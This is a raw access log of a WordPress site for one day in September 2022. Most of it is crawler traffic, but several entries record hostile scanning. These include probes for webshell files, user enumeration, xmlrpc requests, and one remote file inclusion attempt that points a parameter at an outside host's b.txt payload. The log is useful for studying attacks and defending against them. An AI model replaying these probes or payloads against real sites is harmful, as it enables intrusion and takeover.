157.245.77.246 - - [22/Sep/2022:03:11:17 -0700] "GET /wp-content/plugins/seoo/masfix.php?1457 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
157.245.77.246 - - [22/Sep/2022:03:11:31 -0700] "GET /wp-content/plugins/MI77I-X/sym.php?1472 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
157.245.77.246 - - [22/Sep/2022:03:12:05 -0700] "GET /admin.php?1473 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
157.245.77.246 - - [22/Sep/2022:03:12:13 -0700] "GET /co.php?1476 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
114.119.145.139 - - [22/Sep/2022:03:15:32 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
159.65.44.109 - - [22/Sep/2022:03:36:31 -0700] "GET /wp-content/plugins/wpsml-sys.php?1479 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
159.65.44.109 - - [22/Sep/2022:03:36:58 -0700] "GET /wp-admin/maint/update.php?1502 HTTP/1.1" 404 73 "jsdsportsdevelopment.org" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36" "jsdsportsdevelopment.org"
113.125.140.19 - - [22/Sep/2022:03:37:24 -0700] "GET / HTTP/1.1" 200 428 "http://jsdsportsdevelopment.org" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "jsdsportsdevelopment.org"
144.168.162.250 - - [22/Sep/2022:04:32:29 -0700] "GET / HTTP/1.1" 200 1156 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36" "jsdsportsdevelopment.org"
144.168.162.250 - - [22/Sep/2022:04:32:29 -0700] "GET / HTTP/1.1" 200 1156 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36" "www.jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:05:54:58 -0700] "POST /s_noeval.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0" "jsdsportsdevelopment.org"
114.119.141.100 - - [22/Sep/2022:06:04:46 -0700] "GET /wp-includes/blocks/comment-template/?C=N%3BO%3DD HTTP/1.1" 200 459 "https://jsdsportsdevelopment.org/wp-includes/blocks/comment-template/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
66.249.66.30 - - [22/Sep/2022:06:05:17 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:06:08:02 -0700] "GET /wp-content/uploads/nin.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" "jsdsportsdevelopment.org"
114.119.152.70 - - [22/Sep/2022:06:37:32 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:42:50 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:42:51 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:42:51 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:00 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:03 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:10 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:12 -0700] "GET / HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:15 -0700] "GET /?C=D;O=D HTTP/1.1" 200 426 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:23 -0700] "GET /?C=M;O=D HTTP/1.1" 200 419 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:33 -0700] "GET /?C=S;O=D HTTP/1.1" 200 421 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:38 -0700] "GET /?page_id=109 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:43 -0700] "GET /?page_id=14 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:46 -0700] "GET /?page_id=16 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:43:51 -0700] "GET /?page_id=20 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:01 -0700] "GET /?page_id=24 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:06:44:02 -0700] "GET /media-admin.php.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "jsdsportsdevelopment.org"
10.247.24.58 - - [22/Sep/2022:06:44:09 -0700] "POST /wp-cron.php?doing_wp_cron=1663854249.0421690940856933593750 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663854249.0421690940856933593750" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:05 -0700] "GET /blog/index.php/mentoring/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:13 -0700] "GET /blog/index.php/ministry/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:19 -0700] "GET /wp-content/?C=D;O=A HTTP/1.1" 200 354 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:21 -0700] "GET /wp-content/?C=M;O=A HTTP/1.1" 200 354 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:30 -0700] "GET /wp-content/?C=N;O=D HTTP/1.1" 200 352 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:32 -0700] "GET /wp-content/?C=S;O=A HTTP/1.1" 200 355 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:36 -0700] "GET /wp-content/themes/ HTTP/1.1" 200 363 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:41 -0700] "GET /wp-includes/?C=D;O=A HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:44 -0700] "GET /wp-includes/?C=M;O=A HTTP/1.1" 200 406 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:47 -0700] "GET /wp-includes/?C=N;O=D HTTP/1.1" 200 404 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:44:55 -0700] "GET /wp-includes/?C=S;O=A HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:45:05 -0700] "GET /wp-includes/blocks/ HTTP/1.1" 200 715 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:45:12 -0700] "GET /wp-includes/css/ HTTP/1.1" 200 359 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:45:17 -0700] "GET /wp-includes/js/ HTTP/1.1" 200 359 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
162.55.86.60 - - [22/Sep/2022:06:45:19 -0700] "GET /wp-includes/php-compat/ HTTP/1.1" 200 379 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "jsdsportsdevelopment.org"
114.119.141.100 - - [22/Sep/2022:07:03:45 -0700] "GET /wp-includes/blocks/comments-query-loop/editor.css HTTP/1.1" 200 807 "https://jsdsportsdevelopment.org/wp-includes/blocks/comments-query-loop/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:07:04:49 -0700] "POST /stats.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:07:05:32 -0700] "GET /sites/default/files/69.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "jsdsportsdevelopment.org"
185.191.171.14 - - [22/Sep/2022:07:07:41 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
185.191.171.6 - - [22/Sep/2022:07:07:42 -0700] "GET /?page_id=20 HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:07:10:59 -0700] "POST /kontol/index.php?memex=http://152.89.196.13/b.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:07:18:46 -0700] "GET /?C=S%3BO%3DA HTTP/1.1" 200 428 "https://jsdsportsdevelopment.org?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:07:21:56 -0700] "GET /system_log.php?bala=up HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:07:28:42 -0700] "GET /wp-includes/blocks/comments-title/ HTTP/1.1" 200 454 "https://jsdsportsdevelopment.org/wp-includes/blocks/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
152.89.196.13 - - [22/Sep/2022:07:30:10 -0700] "GET /cache/ups.php HTTP/1.1" 404 88 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:07:37:30 -0700] "GET /wp-includes/blocks/comments-pagination/?C=N%3BO%3DD HTTP/1.1" 200 510 "https://jsdsportsdevelopment.org/wp-includes/blocks/comments-pagination/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:07:42:44 -0700] "GET /wp-includes/blocks/pattern/?C=N%3BO%3DD HTTP/1.1" 200 377 "https://jsdsportsdevelopment.org/wp-includes/blocks/pattern/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
10.247.24.58 - - [22/Sep/2022:07:48:00 -0700] "POST /wp-cron.php?doing_wp_cron=1663858080.6923649311065673828125 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663858080.6923649311065673828125" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:07:47:57 -0700] "GET /blog/wp-login.php HTTP/1.1" 200 6686 "http://jsdsportsdevelopment.org/blog/wp-login.php?action=lostpassword" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:07:53:09 -0700] "GET /index.html.bak HTTP/1.1" 200 867 "https://jsdsportsdevelopment.org?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:07:58:23 -0700] "GET /wp-includes/blocks/comment-edit-link/?C=N%3BO%3DD HTTP/1.1" 200 385 "https://jsdsportsdevelopment.org/wp-includes/blocks/comment-edit-link/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
10.247.24.60 - - [22/Sep/2022:08:12:41 -0700] "POST /wp-cron.php?doing_wp_cron=1663859561.2999598979949951171875 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663859561.2999598979949951171875" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:08:12:37 -0700] "GET /blog/?page_id=14 HTTP/1.1" 200 26917 "http://jsdsportsdevelopment.org/blog/sports/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:08:24:40 -0700] "GET /wp-includes/blocks/post-comments/editor-rtl.css HTTP/1.1" 200 793 "https://jsdsportsdevelopment.org/wp-includes/blocks/post-comments/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:08:29:53 -0700] "GET /wp-includes/blocks/navigation/?C=D%3BO%3DA HTTP/1.1" 200 561 "https://jsdsportsdevelopment.org/wp-includes/blocks/navigation/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:08:35:05 -0700] "GET /wp-includes/blocks/comment-content/style-rtl.min.css HTTP/1.1" 200 92 "https://jsdsportsdevelopment.org/wp-includes/blocks/comment-content/?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:08:42:13 -0700] "GET /wp-includes/blocks/widget-group/?C=M%3BO%3DA HTTP/1.1" 200 382 "https://jsdsportsdevelopment.org/wp-includes/blocks/widget-group/?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.130.111 - - [22/Sep/2022:08:58:07 -0700] "GET /wp-includes/blocks/comment-author-name/?C=S%3BO%3DA HTTP/1.1" 200 385 "https://jsdsportsdevelopment.org/wp-includes/blocks/comment-author-name/?C=M%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:09:04:07 -0700] "GET /wp-includes/blocks/comments-pagination/style-rtl.min.css HTTP/1.1" 200 238 "https://jsdsportsdevelopment.org/wp-includes/blocks/comments-pagination/" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.87 - - [22/Sep/2022:09:31:01 -0700] "GET /wp-includes/blocks/navigation-link/style.css HTTP/1.1" 200 829 "https://jsdsportsdevelopment.org/wp-includes/blocks/navigation-link/?C=N%3BO%3DD" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
114.119.140.99 - - [22/Sep/2022:09:40:24 -0700] "GET /wp-includes/blocks/post-comments/?C=N%3BO%3DD HTTP/1.1" 200 501 "https://jsdsportsdevelopment.org/wp-includes/blocks/post-comments/?C=S%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "jsdsportsdevelopment.org"
51.222.253.15 - - [22/Sep/2022:10:13:38 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:00 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:03 -0700] "GET /?C=D;O=A HTTP/1.1" 200 428 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:05 -0700] "GET /?C=M;O=A HTTP/1.1" 200 422 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:10 -0700] "GET /?C=N;O=D HTTP/1.1" 200 426 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:13 -0700] "GET /?C=S;O=A HTTP/1.1" 200 421 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
10.247.24.59 - - [22/Sep/2022:11:02:21 -0700] "POST /wp-cron.php?doing_wp_cron=1663869741.5679280757904052734375 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663869741.5679280757904052734375" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:18 -0700] "GET /blog/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:25 -0700] "GET /index.html.bak HTTP/1.1" 200 867 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:29 -0700] "GET /index.html.bakk HTTP/1.1" 200 867 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:32 -0700] "GET /wp-content/ HTTP/1.1" 200 354 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
37.187.94.3 - - [22/Sep/2022:11:02:35 -0700] "GET /wp-includes/ HTTP/1.1" 200 405 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "jsdsportsdevelopment.org"
81.68.87.46 - - [22/Sep/2022:11:28:25 -0700] "GET /wp-login.php HTTP/1.1" 404 88 "http://jsdsportsdevelopment.org/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:30 -0700] "GET /wp-includes/ID3/license.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:30 -0700] "GET /feed/ HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:31 -0700] "GET /xmlrpc.php?rsd HTTP/1.1" 404 73 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:31 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 1045 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
10.247.24.60 - - [22/Sep/2022:11:38:34 -0700] "POST /wp-cron.php?doing_wp_cron=1663871914.4432430267333984375000 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663871914.4432430267333984375000" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:31 -0700] "GET /blog//?author=1 HTTP/1.1" 200 23436 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:35 -0700] "GET /blog/index.php//wp-json/wp/v2/users/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:37 -0700] "GET /blog/index.php//wp-json/oembed/1.0/embed?url=https://jsdsportsdevelopment.org//blog/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
20.29.76.232 - - [22/Sep/2022:11:38:39 -0700] "POST /blog/index.php//xmlrpc.php HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "jsdsportsdevelopment.org"
207.46.13.232 - - [22/Sep/2022:12:45:08 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "jsdsportsdevelopment.org"
10.247.24.58 - - [22/Sep/2022:12:45:19 -0700] "POST /wp-cron.php?doing_wp_cron=1663875919.7117109298706054687500 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663875919.7117109298706054687500" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
157.55.39.44 - - [22/Sep/2022:12:45:16 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "jsdsportsdevelopment.org"
10.247.24.58 - - [22/Sep/2022:13:21:57 -0700] "POST /wp-cron.php?doing_wp_cron=1663878117.1467189788818359375000 HTTP/1.1" 404 88 "https://jsdsportsdevelopment.org/wp-cron.php?doing_wp_cron=1663878117.1467189788818359375000" "WordPress/6.0.1; https://jsdsportsdevelopment.org" "jsdsportsdevelopment.org"
207.46.13.148 - - [22/Sep/2022:13:21:54 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 28684 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "jsdsportsdevelopment.org"
